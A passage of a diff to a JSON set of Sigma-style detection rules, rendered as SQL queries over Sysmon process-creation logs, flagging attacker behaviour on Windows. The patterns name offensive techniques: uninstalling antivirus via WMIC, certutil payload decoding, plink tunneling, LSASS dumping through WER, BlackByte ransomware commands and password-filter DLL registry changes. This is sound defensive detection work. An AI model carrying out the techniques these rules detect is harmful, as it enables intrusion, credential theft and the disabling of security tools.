WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (Image LIKE '%\\\\jusched.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_jusched.yml" + "filename": "proc_creation_win_wmic_uninstall_security_products.yml" }, { - "title": "File Decoded From Base64/Hex Via Certutil.EXE", - "id": "cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7", - "status": "test", - "description": "Detects the execution of certutil with either the \"decode\" or \"decodehex\" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "Computer Password Change Via Ksetup.EXE", + "id": "de16d92c-c446-4d53-8938-10aeef41c8b6", + "status": "experimental", + "description": "Detects password change for the computer's domain account or host principal via \"ksetup.exe\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-decode %' ESCAPE '\\' OR CommandLine LIKE '%/decode %' ESCAPE '\\' OR CommandLine LIKE '%-decodehex %' ESCAPE '\\' OR CommandLine LIKE '%/decodehex %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ksetup.exe' ESCAPE '\\' OR OriginalFileName = 'ksetup.exe') AND CommandLine LIKE '% /setcomputerpassword %' ESCAPE '\\')" ], - "filename": "proc_creation_win_certutil_decode.yml" + "filename": "proc_creation_win_ksetup_password_change_computer.yml" }, { - "title": "Rundll32 With Suspicious Parent Process", - "id": "1723e720-616d-4ddc-ab02-f7e3685a4713", + "title": "Renamed Sysinternals Sdelete Execution", + "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", "status": "experimental", - "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. Variant of Raspberry Robin, as first reported by Red Canary.", - "author": "CD_ROM_", + "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.impact", + "attack.t1485" ], + "falsepositives": [ + "System administrator usage" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((Image LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" + }, + { + "title": "Suspicious Msiexec Quiet Install From Remote Location", + "id": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", + "status": "experimental", + "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "medium", + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '% -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\') AND (CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_parent_explorer.yml" + "filename": "proc_creation_win_msiexec_install_remote.yml" }, { - "title": "Filter Driver Unloaded Via Fltmc.EXE", - "id": "4931188c-178e-4ee7-a348-39e8a7a56821", - "status": "test", - "description": "Detect filter driver unloading activity via fltmc.exe", - "author": "Nasreddine Bencherchali", + "title": "Renamed CreateDump Utility Execution", + "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", + "status": "experimental", + "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Command lines that use the same flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\createdump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_fltmc_unload_driver.yml" + "filename": "proc_creation_win_renamed_createdump.yml" }, { - "title": "Curl.EXE Execution With Custom UserAgent", - "id": "3286d37a-00fd-41c2-a624-a672dcd34e60", - "status": "test", - "description": "Detects execution of curl.exe with custom useragent options", + "title": "Suspicious Cmdl32 Execution", + "id": "f37aba28-a9e6-4045-882c-d5004043b337", + "status": "experimental", + "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1071.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -A %' ESCAPE '\\' OR CommandLine LIKE '% --user-agent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR OriginalFileName = 'CMDL32.EXE') AND (CommandLine LIKE '%/vpn %' ESCAPE '\\' AND CommandLine LIKE '%/lan %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_curl_useragent.yml" + "filename": "proc_creation_win_lolbin_cmdl32.yml" }, { - "title": "WhoAmI as Parameter", - "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", - "status": "test", - "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", - "author": "Florian Roth (Nextron Systems)", + "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", + "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", + "status": "experimental", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_whoami_as_param.yml" + "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" }, { - "title": "Read Contents From Stdin Via Cmd.EXE", - "id": "241e802a-b65e-484f-88cd-c2dc10f9206d", + "title": "Suspicious File Execution From Internet Hosted WebDav Share", + "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", "status": "experimental", - "description": "Detect the use of \"<\" to read and potentially execute a file via cmd.exe", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", + "author": "pH-T (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.003" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND CommandLine LIKE '%<%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_stdin_redirect.yml" + "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" }, { - "title": "Potential Credential Dumping Via WER", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", + "title": "Potential Data Stealing Via Chromium Headless Debugging", + "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", "status": "experimental", - "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", - "author": "@pbssubhash , Nasreddine Bencherchali", + "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1185" ], "falsepositives": [ - "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" ], - "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" + "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" }, { - "title": "Suspicious Reg Add BitLocker", - "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "title": "Potential Rundll32 Execution With DLL Stored In ADS", + "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", "status": "experimental", - "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", - "author": "frack113", + "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", + "author": "Harjot Singh, '@cyb3rjy0t'", "tags": [ - "attack.impact", - "attack.t1486" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" ], - "filename": "proc_creation_win_reg_bitlocker.yml" + "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" }, { - "title": "Unusual Child Process of dns.exe", - "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", - "status": "experimental", - "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch", + "title": "Execution in Outlook Temp Folder", + "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", + "status": "test", + "description": "Detects a suspicious program execution in Outlook temp folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.initial_access", - "attack.t1133" + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_dns_susp_child_process.yml" + "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" }, { - "title": "Potential BlackByte Ransomware Activity", - "id": "999e8307-a775-4d5f-addc-4855632335be", - "status": "test", - "description": "Detects command line patterns used by BlackByte ransomware in different operations", + "title": "Suspicious Hacktool Execution - PE Metadata", + "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "status": "experimental", + "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Company = 'Cube0x0')" ], - "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" + "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" }, { - "title": "Potential Suspicious Windows Feature Enabled - ProcCreation", - "id": "c740d4cf-a1e9-41de-bb16-8a46a4f57918", - "status": "experimental", - "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Dropping Of Password Filter DLL", + "id": "b7966f4a-b333-455b-8370-8ca53c229762", + "status": "test", + "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", + "author": "Sreeman", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1556.002" ], "falsepositives": [ - "Legitimate usage of the features listed in the rule." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND CommandLine LIKE '%-Online%' ESCAPE '\\' AND CommandLine LIKE '%-FeatureName%' ESCAPE '\\' AND (CommandLine LIKE '%TelnetServer%' ESCAPE '\\' OR CommandLine LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR CommandLine LIKE '%TFTP%' ESCAPE '\\' OR CommandLine LIKE '%SMB1Protocol%' ESCAPE '\\' OR CommandLine LIKE '%Client-ProjFS%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '%scecli\\\\0%' ESCAPE '\\' AND CommandLine LIKE '%reg add%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_enable_susp_windows_optional_feature.yml" + "filename": "proc_creation_win_reg_credential_access_via_password_filter.yml" }, { - "title": "Suspicious WindowsTerminal Child Processes", - "id": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", - "status": "experimental", - "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Exploiting SetupComplete.cmd CVE-2019-1378", + "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", + "status": "test", + "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ + "attack.privilege_escalation", + "attack.t1068", "attack.execution", - "attack.persistence" + "attack.t1059.003", + "attack.t1574", + "cve.2019.1378" ], "falsepositives": [ - "Other legitimate \"Windows Terminal\" profiles" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WindowsTerminal.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wt.exe' ESCAPE '\\') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\csc.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% iex %' ESCAPE '\\' OR CommandLine LIKE '% icm%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%Import-Module%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft.VisualStudio.DevShell.dll%' ESCAPE '\\' AND CommandLine LIKE '%Enter-VsDevShell%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.WindowsTerminal\\_%' ESCAPE '\\' AND CommandLine LIKE '%\\\\LocalState\\\\settings.json%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Common7\\\\Tools\\\\VsDevCmd.bat%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_windows_terminal_susp_children.yml" + "filename": "proc_creation_win_exploit_cve_2019_1378.yml" }, { - "title": "Suspicious HWP Sub Processes", - "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", + "title": "Potential RDP Tunneling Via SSH Plink", + "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", "status": "test", - "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "description": "Execution of plink to perform data exfiltration and tunneling", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1203", - "attack.t1059.003", - "attack.g0032" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND Image LIKE '%\\\\gbb.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hwp_exploits.yml" + "filename": "proc_creation_win_plink_susp_tunneling.yml" }, { - "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", - "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", + "title": "Suspicious Scheduled Task Creation Involving Temp Folder", + "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", "status": "test", - "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE 